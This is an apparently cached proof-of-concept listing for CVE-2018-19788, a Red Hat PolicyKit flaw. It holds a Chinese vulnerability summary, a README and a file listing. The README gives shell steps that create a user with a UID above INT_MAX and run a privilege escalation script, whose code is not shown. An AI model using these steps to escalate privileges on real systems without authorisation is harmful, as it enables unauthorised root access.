CVE-2018-19788 PoC — Red Hat PolicyKit 输入验证错误漏洞

Source

https://github.com/AbsoZed/CVE-2018-19788

Associated Vulnerability

Title:Red Hat PolicyKit 输入验证错误漏洞 (CVE-2018-19788)
Description:Red Hat PolicyKit（Polkit）是美国红帽（Red Hat）公司的一个用于在Unix兼容系统中对应用程序进行权限控制的工具。该工具为现代桌面提供了一个中央框架用于授权一般应用程序进行特权工作。 Red Hat PolicyKit 0.115版本中存在安全漏洞。攻击者可利用该漏洞执行任意的systemctl命令。

Description

Silly easy exploit for CVE-2018-19788

Readme

# CVE-2018-19788
Silly easy exploit for CVE-2018-19788

To use this, you must either create a user with UID > INT_MAX in Policy Kit or already have a low-priv user with said UID.

UID can be specified in user creation as follows, and used before execution of the script:

```bash
$ useradd -u 4000000001 PrivEsc
$ passwd PrivEsc
$ su PrivEsc
$ chmod +x /tmp/CVE-2018-19788_PrivEsc.sh
$ ./tmp/CVE-2018-19788_PrivEsc.sh
```

Please note this is merely for research and you are responsible for your own usage of any code found in this repository or any other, as common sense dictates.

File Snapshot


 [4.0K]  /data/pocs/99535a92e15289286106db0fdd478c79491c68b5
├── [1.2K]  CVE-2018-19788_PrivEsc.sh
├── [ 34K]  LICENSE
└── [ 583]  README.md

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!